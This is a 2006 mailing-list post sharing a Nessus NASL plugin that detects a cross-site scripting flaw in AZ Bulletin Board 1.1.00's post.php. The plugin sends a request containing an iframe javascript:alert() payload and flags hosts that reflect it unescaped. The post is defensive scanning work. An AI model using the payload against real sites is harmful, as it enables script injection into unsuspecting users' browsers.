
Azbb 1.1.00 Cross_Site_Scripting
hi 2 all
this is my first mail.
i wrote a script for the Azbb 1.1.00 Cross_Site_Scripting vulnerability that was discovered by my team mate at KAPDA.
Original Advisory: http://kapda.ir/advisory-236.html
comments are welcome :)

#
# This script was written by Pedram Hayati <pi3ch at kapda dot ir>
# (C) KAPDA Computer Security Science Researchers Institute
# http://www.kapda.ir
#
# This script is released under the GNU GPL v2

# Registration phase: when the scanner sets 'description', the script only
# declares its metadata (name, text, category, family, dependency, ports)
# and exits before any request is sent.
if (description)
{
  script_version("$Revision: 1.0 $");

  script_name(english:"Azbb XSS");

  # Report text shown to the operator; kept verbatim.
  script_description(english:"
The 'AZ Bulletin Board' PHP is installed. This version is affected by a
cross-site scripting vulnerability. This issue is due to a failure
of the application to properly sanitize user-supplied input.

As a result of this vulnerability, it is possible for a remote attacker
to create a malicious link containing script code that will be executed
in the browser of an unsuspecting user when followed.
Original Advisory: http://kapda.ir/advisory-236.html
Solution : Vendor contacted
Risk factor : Low");

  script_summary(english:"Checks post.php XSS");

  script_category(ACT_GATHER_INFO);

  script_copyright(english:"This script is Copyright (C) 2006 Pedram Hayati");

  script_family(english:"CGI abuses : XSS", francais:"Abus de CGI");

  # The main body reads the generic_XSS knowledge-base item before probing,
  # so the generic XSS plugin is declared as a dependency here.
  script_dependencie("cross_site_scripting.nasl");
  script_require_ports("Services/www", 80);
  exit(0);
}

#
# The script code starts here
#

include("http_func.inc");
include("http_keepalive.inc");

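# Pick the HTTP port to test, defaulting to 80.
port = get_http_port(default:80);

# Nothing to check when the port is not open.
if (!get_port_state(port)) exit(0);

# Skip hosts already flagged in the knowledge base as reflecting script
# generically (presumably set by the cross_site_scripting.nasl dependency),
# since a positive result there could not be attributed to this application.
if (get_kb_item("www/" + port + "/generic_XSS")) exit(0);

foreach dir (cgi_dirs())
{
  # NOTE(review): the trailing ' [XSS]' looks like an annotation copied from
  # the advisory. Its raw space lands inside the HTTP request line, which some
  # servers may reject as malformed - confirm against a known-affected install.
  req = string(dir, "/post.php?topic=>\"<br><iframe%20src=javascript:alert()><br>\" [XSS]");
  req = http_get(item:req, port:port);
  r = http_keepalive_send_recv(port:port, data:req, bodyonly:1);
  if (r == NULL) exit(0);

  # Report only when the probe tag comes back with its angle brackets intact.
  # An unescaped "()" in the pattern is an empty regex group, so matching on
  # "javascript:alert()" alone also fires when the application has safely
  # HTML-escaped the value (&lt;iframe ... &gt;), giving a false positive.
  # The separator accepts either a decoded space or a literal %20.
  if (egrep(pattern:"<iframe( |%20)src=javascript:alert\(\)>", string:r))
  {
    security_warning(port);
    exit(0);
  }
}
exit(0);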



Pi3cH(Pedram Hayati)
http://www.KAPDA.ir
<Computer Security Science Researchers Institute>
